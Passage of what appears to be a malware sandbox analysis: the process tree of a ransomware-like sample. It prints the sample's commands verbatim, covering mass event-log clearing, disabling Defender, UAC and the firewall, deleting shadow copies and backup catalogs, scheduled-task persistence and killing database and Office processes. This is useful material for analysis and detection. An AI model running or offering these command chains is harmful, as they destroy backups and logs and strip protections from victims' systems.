        wevtutil.exe cl "Microsoft-Windows-RemoteApp and Desktop Connections/Admin"
        7⤵
        Clears Windows event logs
        
        PID:14212
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Admin"
        7⤵
        
        PID:14312
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Operational"
        7⤵
        
        PID:14232
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RemoteAssistance/Tracing"
        7⤵
        
        PID:2884
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Admin"
        7⤵
        
        PID:14280
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational"
        7⤵
        
        PID:14348
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Remotefs-UTProvider/Diagnostic"
        7⤵
        
        PID:14340
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Detector/Operational"
        7⤵
        Clears Windows event logs
        
        PID:14264
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Resolver/Operational"
        7⤵
        
        PID:14252
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Resource-Leak-Diagnostic/Operational"
        7⤵
        
        PID:14248
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ResourcePublication/Tracing"
        7⤵
        
        PID:14308
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-RestartManager/Operational"
        7⤵
        
        PID:14288
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Search-Core/Diagnostic"
        7⤵
        
        PID:14384
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Search-ProtocolHandlers/Diagnostic"
        7⤵
        
        PID:14368
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Diagnostic"
        7⤵
        
        PID:14360
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-Audit-Configuration-Client/Operational"
        7⤵
        
        PID:14464
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-IdentityListener/Operational"
        7⤵
        
        PID:1544
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Security-SPP/Perf"
        7⤵
        
        PID:14456
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Sens/Debug"
        7⤵
        
        PID:14412
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ServiceReportingApi/Debug"
        7⤵
        
        PID:14508
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Services-Svchost/Diagnostic"
        7⤵
        
        PID:14520
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Services/Diagnostic"
        7⤵
        
        PID:14540
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Setup/Analytic"
        7⤵
        Clears Windows event logs
        
        PID:14556
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SetupCl/Analytic"
        7⤵
        
        PID:14364
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SetupQueue/Analytic"
        7⤵
        Clears Windows event logs
        
        PID:14388
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SetupUGC/Analytic"
        7⤵
        
        PID:14292
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ShareMedia-ControlPanel/Diagnostic"
        7⤵
        
        PID:14532
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-BootAnim/Diagnostic"
        7⤵
        
        PID:14504
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Common/Diagnostic"
        7⤵
        
        PID:14448
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-CredUI/Diagnostic"
        7⤵
        
        PID:14580
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Logon/Diagnostic"
        7⤵
        
        PID:14584
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-PasswordProvider/Diagnostic"
        7⤵
        
        PID:14600
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Shutdown/Diagnostic"
        7⤵
        
        PID:14624
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-Core/Diagnostic"
        7⤵
        
        PID:14676
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-DefaultPrograms/Diagnostic"
        7⤵
        
        PID:14652
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-Shwebsvc"
        7⤵
        
        PID:14176
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shell-ZipFolder/Diagnostic"
        7⤵
        
        PID:14680
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Shsvcs/Diagnostic"
        7⤵
        
        PID:14700
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Sidebar/Diagnostic"
        7⤵
        
        PID:14720
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Speech-UserExperience/Diagnostic"
        7⤵
        
        PID:14736
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Spell-Checking/Analytic"
        7⤵
        
        PID:14776
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-SpellChecker/Analytic"
        7⤵
        
        PID:14920
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-StickyNotes/Admin"
        7⤵
        
        PID:1844
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-StickyNotes/Debug"
        7⤵
        
        PID:1808
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-StickyNotes/Diagnostic"
        7⤵
        
        PID:4284
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-StorDiag/Operational"
        7⤵
        
        PID:14608
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-StorPort/Operational"
        7⤵
        
        PID:14632
        
        C:\Windows\SysWOW64\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Subsys-Csr/Operational"
        7⤵
        
        PID:14656
    - - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist /fi "ImageName eq 995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe" /fo csv
        5⤵
        Enumerates processes with tasklist
        
        PID:7328
    - - C:\Windows\SysWOW64\find.exe
        
        find /I "995a91e668b85a992c8a71aed191fa0fafa3b1606bf205bef93a2457786de555.exe"
        5⤵
        
        PID:7324
    - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe"
        5⤵
        Executes dropped EXE
        
        PID:7372
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 15 /nobreak
        5⤵
        Delays execution with timeout.exe
        
        PID:7544
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 15 /nobreak
        5⤵
        Delays execution with timeout.exe
        
        PID:13016
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:556
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\Admin\AppData\S-2153.bat'" /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:300
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c echo %date%-%time%
  2⤵
  PID:308
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"
  2⤵
  PID:1204
- - C:\Windows\SysWOW64\systeminfo.exe
    systeminfo
    3⤵
    - Gathers system information
    PID:2040
- - C:\Windows\SysWOW64\find.exe
    find /i "os name"
    3⤵
    PID:1600
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c systeminfo|find /i "original"
  2⤵
  PID:1280
- - C:\Windows\SysWOW64\systeminfo.exe
    systeminfo
    3⤵
    - Gathers system information
    PID:1052
- - C:\Windows\SysWOW64\find.exe
    find /i "original"
    3⤵
    PID:1108
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ver
  2⤵
  PID:548
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
  2⤵
  PID:2228
- - C:\Windows\SysWOW64\reg.exe
    reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
    3⤵
    PID:1708
- - C:\Windows\SysWOW64\reg.exe
    reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
    3⤵
    - UAC bypass
    - Modifies registry key
    PID:2340
- - C:\Windows\SysWOW64\vssadmin.exe
    vssadmin.exe Delete Shadows /All /Quiet
    3⤵
    - Interacts with shadow copies
    PID:2344
- - C:\Windows\SysWOW64\Wbem\WMIC.exe
    wmic shadowcopy delete
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2204
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall set currentprofile state off
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:1180
- - C:\Windows\SysWOW64\netsh.exe
    netsh firewall set opmode mode=disable
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:2080
- - C:\Windows\SysWOW64\netsh.exe
    netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    PID:404
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskkill /im mydesktopqos.exe&taskkill /im isqlplussvc.exe&taskkill /im xfssvccon.exe&taskkill /im mydesktopservice.exe&taskkill /im ocautoupds.exe&taskkill /im agntsvc.exe&taskkill /im encsvc.exe&taskkill /im firefoxconfig.exe&taskkill /im tbirdconfig.exe&taskkill /im ocomm.exe&taskkill /im mysqld.exe&taskkill /im mysqld-nt.exe&taskkill /im mysqld-opt.exe&taskkill /im dbeng50.exe&taskkill /im sqbcoreservice.exe&taskkill /im excel.exe&taskkill /im infopath.exe&taskkill /im msaccess.exe&taskkill /im mspub.exe&taskkill /im onenote.exe&taskkill /im outlook.exe&taskkill /im powerpnt.exe&taskkill /im steam.exe&taskkill /im thebat.exe&taskkill /im thebat64.exe&taskkill /im thunderbird.exe&taskkill /im visio.exe&taskkill /im winword.exe&taskkill /im wordpad.exe
  2⤵
  PID:948
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im msftesql.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:676
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im sqlagent.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1744
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im sqlbrowser.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1904
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im sqlservr.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1776
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im sqlwriter.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:872
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im oracle.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2156
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im ocssd.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1088
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im dbsnmp.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2556
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im synctime.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2400
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im agntsvc.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2404
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im mydesktopqos.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1780
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im isqlplussvc.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1332
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im xfssvccon.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1736
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im mydesktopservice.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2064
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im ocautoupds.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1572
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im agntsvc.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2716
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im encsvc.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1040
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im firefoxconfig.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2840
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im tbirdconfig.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2152
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im ocomm.exe
    3⤵
    - Kills process with taskkill
    PID:2788
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im mysqld.exe
    3⤵
    - Kills process with taskkill
    PID:2724
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im mysqld-nt.exe
    3⤵
    - Kills process with taskkill
    PID:2620
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im mysqld-opt.exe
    3⤵
    - Kills process with taskkill
    PID:1616
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im dbeng50.exe
    3⤵
    - Kills process with taskkill
    PID:524
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im sqbcoreservice.exe
    3⤵
    PID:2168
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im excel.exe
    3⤵
    - Kills process with taskkill
    PID:1880
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im infopath.exe
    3⤵
    - Kills process with taskkill
    PID:1228
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im msaccess.exe
    3⤵
    - Kills process with taskkill
    PID:300
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im mspub.exe
    3⤵
    - Kills process with taskkill
    PID:1604
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im onenote.exe
    3⤵
    PID:1636
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im outlook.exe
    3⤵
    - Kills process with taskkill
    PID:2804
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im powerpnt.exe
    3⤵
    PID:1812
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im steam.exe
    3⤵
    - Kills process with taskkill
    PID:1828
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im thebat.exe
    3⤵
    - Kills process with taskkill
    PID:1204
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im thebat64.exe
    3⤵
    PID:1052
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im thunderbird.exe
    3⤵
    - Kills process with taskkill
    PID:828
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im visio.exe
    3⤵
    - Kills process with taskkill
    PID:2440
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im winword.exe
    3⤵
    - Kills process with taskkill
    PID:2996
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im wordpad.exe
    3⤵
    - Kills process with taskkill
    PID:824
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c taskkill /im mshta.exe /f
  2⤵
  PID:15588
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /im mshta.exe /f
    3⤵
    - Kills process with taskkill
    PID:15624
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\SysWOW64\mshta.exe" "C:\Documents and Settings\Admin\Desktop\ReadMe.hta"
  2⤵
  - Modifies Internet Explorer settings
  PID:15480
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\ReadMe.hta"
  2⤵
  - Modifies Internet Explorer settings
  PID:5088
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
  2⤵
  PID:15376
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c wevtutil.exe el
    3⤵
    PID:15364
  - - C:\Windows\SysWOW64\wevtutil.exe
      wevtutil.exe el
      4⤵
      PID:15348
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Analytic"
    3⤵
    PID:15276
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Application"
    3⤵
    PID:5372
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "DebugChannel"
    3⤵
    - Clears Windows event logs
    PID:15836
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "DirectShowFilterGraph"
    3⤵
    PID:15860
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "DirectShowPluginControl"
    3⤵
    PID:15964
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Els_Hyphenation/Analytic"
    3⤵
    PID:15932
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "EndpointMapper"
    3⤵
    PID:15844
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "ForwardedEvents"
    3⤵
    PID:15968
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "HardwareEvents"
    3⤵
    PID:15936
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Internet Explorer"
    3⤵
    PID:15900
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Key Management Service"
    3⤵
    - Clears Windows event logs
    PID:16068
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "MF_MediaFoundationDeviceProxy"
    3⤵
    PID:16052
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Media Center"
    3⤵
    PID:16060
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "MediaFoundationDeviceProxy"
    3⤵
    PID:16028
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "MediaFoundationPerformance"
    3⤵
    PID:16020
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "MediaFoundationPipeline"
    3⤵
    PID:16012
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "MediaFoundationPlatform"
    3⤵
    PID:15880
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-IE/Diagnostic"
    3⤵
    PID:15984
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-IEDVTOOL/Diagnostic"
    3⤵
    PID:16084
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"
    3⤵
    PID:16180
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"
    3⤵
    PID:16168
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"
    3⤵
    PID:16668
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"
    3⤵
    PID:6824
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"
    3⤵
    PID:16664
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-API-Tracing/Operational"
    3⤵
    PID:16008
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ATAPort/General"
    3⤵
    - Clears Windows event logs
    PID:16600
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"
    3⤵
    PID:16608
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"
    3⤵
    PID:16192
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AltTab/Diagnostic"
    3⤵
    PID:16588
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppID/Operational"
    3⤵
    PID:16576
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"
    3⤵
    PID:16556
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"
    3⤵
    PID:16532
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"
    3⤵
    PID:16564
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"
    3⤵
    PID:16572
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"
    3⤵
    PID:16520
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"
    3⤵
    PID:16536
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Problem-Steps-Recorder"
    3⤵
    PID:16492
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
    3⤵
    PID:16484
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
    3⤵
    PID:16476
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"
    3⤵
    - Clears Windows event logs
    PID:16452
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory/Debug"
    3⤵
    PID:16436
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"
    3⤵
    PID:16428
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"
    3⤵
    - Clears Windows event logs
    PID:5272
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/Operational"
    3⤵
    PID:6756
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audio/Performance"
    3⤵
    PID:16392
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"
    3⤵
    PID:12660
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"
    3⤵
    PID:7092
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"
    3⤵
    PID:5864
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Backup"
    3⤵
    PID:3544
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"
    3⤵
    PID:6132
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"
    3⤵
    PID:16308
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"
    3⤵
    PID:16324
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"
    3⤵
    PID:16312
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"
    3⤵
    PID:16348
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"
    3⤵
    PID:16248
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"
    3⤵
    PID:16276
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"
    3⤵
    PID:16264
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"
    3⤵
    PID:16240
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"
    3⤵
    PID:16232
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"
    3⤵
    PID:16284
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"
    3⤵
    PID:16692
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"
    3⤵
    PID:7384
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COM/Analytic"
    3⤵
    PID:16708
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"
    3⤵
    PID:16744
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Calculator/Debug"
    3⤵
    PID:16772
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Calculator/Diagnostic"
    3⤵
    PID:6124
- - C:\Windows\SysWOW64\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"
    3⤵
    PID:4844
- - C:\Windows\SysWOW64\wevtutil.exe
